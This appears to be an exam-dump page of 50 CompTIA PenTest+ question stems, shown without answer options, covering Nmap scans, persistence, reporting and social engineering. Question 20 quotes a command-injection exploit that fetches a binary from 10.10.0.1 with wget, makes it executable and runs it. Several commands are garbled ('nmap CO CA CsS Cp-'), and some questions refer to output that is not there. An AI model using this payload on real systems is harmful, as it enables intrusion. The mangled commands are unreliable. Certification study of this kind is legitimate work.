Updated CompTIA PenTest+ PT0-002 Exam Dumps [2022] Pass PT0-002 Exam Smoothly

1. Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?

2. Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

3. A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment .

Which of the following could be used for a denial-of-service attack on the network segment?

4. An assessment has been completed, and all reports and evidence have been turned over to the client .

Which of the following should be done NEXT to ensure the confidentiality of the client’s information?

5. A penetration tester was able to gain access successfully to a Windows workstation on a mobile client’s laptop .

Which of the following can be used to ensure the tester is able to maintain access to the system?

6. A penetration tester ran an Nmap scan on an Internet-facing network device with the CF option and found a few open ports.

To further enumerate, the tester ran another scan using the following command:

nmap CO CA CsS Cp- 100.100.100.50

Nmap returned that all 65,535 ports were filtered .

Which of the following MOST likely occurred on the second scan?

7. The results of an Nmap scan are as follows:

Which of the following would be the BEST conclusion about this device?

8. Given the following output:

User-agent:*

Disallow: /author/

Disallow: /xmlrpc.php

Disallow: /wp-admin

Disallow: /page/

During which of the following activities was this output MOST likely obtained?

9. A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions .

Which of the following commands would help the tester START this process?

10. Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?

11. The results of an Nmap scan are as follows:

Starting Nmap 7.80 (https://nmap.org) at 2021-01-24 01:10 EST

Nmap scan report for (10.2.1.22)

Host is up (0.0102s latency).

Not shown: 998 filtered ports

Port State Service

80/tcp open http

|_http-title: 80F 22% RH 1009.1MB (text/html)

|_http-slowloris-check:

| VULNERABLE:

| Slowloris DoS Attack

| <..>

Device type: bridge|general purpose

Running (JUST GUESSING) : QEMU (95%)

OS CPE: cpe:/a:qemu:qemu

No exact OS matches found for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at https://nmap.org/submit/.

Nmap done: 1 IP address (1 host up) scanned in 107.45 seconds

Which of the following device types will MOST likely have a similar response? (Choose two.)

12. A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot .

Which of the following techniques would BEST support this objective?

13. DRAG DROP

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

14. A penetration tester wants to scan a target network without being detected by the client’s IDS .

Which of the following scans is MOST likely to avoid detection?

15. Penetration-testing activities have concluded, and the initial findings have been reviewed with the client .

Which of the following best describes the NEXT step in the engagement?

16. A penetration tester recently completed a review of the security of a core network device within a corporate environment.

The key findings are as follows:

• The following request was intercepted going to the network device:

GET /login HTTP/1.1

Host: 10.50.100.16

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0

Accept-Language: en-US,en;q=0.5

Connection: keep-alive

Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk

• Network management interfaces are available on the production network.

• An Nmap scan returned the following:

Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

17. A penetration tester is working on a scoping document with a new client.

The methodology the client uses includes the following:

✑ Pre-engagement interaction (scoping and ROE)

✑ Intelligence gathering (reconnaissance)

✑ Threat modeling

✑ Vulnerability analysis

✑ Exploitation and post exploitation

✑ Reporting

Which of the following methodologies does the client use?

18. A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

19. A penetration tester has been given eight business hours to gain access to a client’s financial system .

Which of the following techniques will have the highest likelihood of success?

20. A penetration tester was able to gain access to a system using an exploit.

The following is a snippet of the code that was utilized:

exploit = “POST ”

exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} C

c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a”

exploit += “HTTP/1.1”

Which of the following commands should the penetration tester run post-engagement?

21. A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code .

Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries?

22. A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good .

Which of the following recommendations should the penetration tester include in the report?

23. Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:

24. A penetration tester ran the following command on a staging server:

python Cm SimpleHTTPServer 9891

Which of the following commands could be used to download a file named exploit to a target machine for execution?

25. Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

26. A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol .

Which of the following methods would be the BEST to accomplish this objective?

27. In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name- serial_number> .

Which of the following would be the best action for the tester to take NEXT with this information?

28. Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?

29. An Nmap network scan has found five open ports with identified services .

Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

30. Appending string values onto another string is called:

31. A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday .

Which of the following should the security company have acquired BEFORE the start of the assessment?

32. A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository.

After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

33. A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.

Which of the following is the BEST way to ensure this is a true positive?

34. A penetration tester is scanning a corporate lab network for potentially vulnerable services .

Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

35. A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running .

Which of the following would BEST support this task?

36. A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data .

Which of the following should the tester do with this information to make this a successful exploit?

37. A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines .

Which of the following documents could hold the penetration tester accountable for this action?

38. A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host .

Which of the following utilities would BEST support this objective?

39. A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources .

Which of the following attack types is MOST concerning to the company?

40. A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP .

Which of the following steps should the tester take NEXT?

41. A penetration tester received a .pcap file to look for credentials to use in an engagement.

Which of the following tools should the tester utilize to open and read the .pcap file?

42. A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations .

Which of the following are considered passive reconnaissance tools? (Choose two.)

43. A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

However, when the penetration tester tried to browse the URL

http://172.16.100.10:3000/profile, a blank page was displayed.

Which of the following is the MOST likely reason for the lack of output?

44. A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee’s birthday, the tester gave the employee an external hard drive as a gift .

Which of the following social-engineering attacks was the tester utilizing?

45. A penetration tester ran a ping CA command during an unknown environment test, and it returned a 128 TTL packet .

Which of the following OSs would MOST likely return a packet of this type?

46. A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache .

Which of the following commands will accomplish this task?

47. A compliance-based penetration test is primarily concerned with:

48. A penetration tester runs a scan against a server and obtains the following output:

21/tcp open ftp Microsoft ftpd

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| 03-12-20 09:23AM 331 index.aspx

| ftp-syst:

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2012 Std 3389/tcp open ssl/ms-wbt-server | rdp-ntlm-info:

| Target Name: WEB3

| NetBIOS_Computer_Name: WEB3

| Product_Version: 6.3.9600

|_ System_Time: 2021-01-15T11:32:06+00:00 8443/tcp open http Microsoft IIS httpd 8.5

| http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.5

|_http-title: IIS Windows Server

Which of the following command sequences should the penetration tester try NEXT?

49. A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration tester’s IP address .

Which of the following BEST describes what happened?

50. A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself .

Which of the following vulnerabilities has the tester exploited?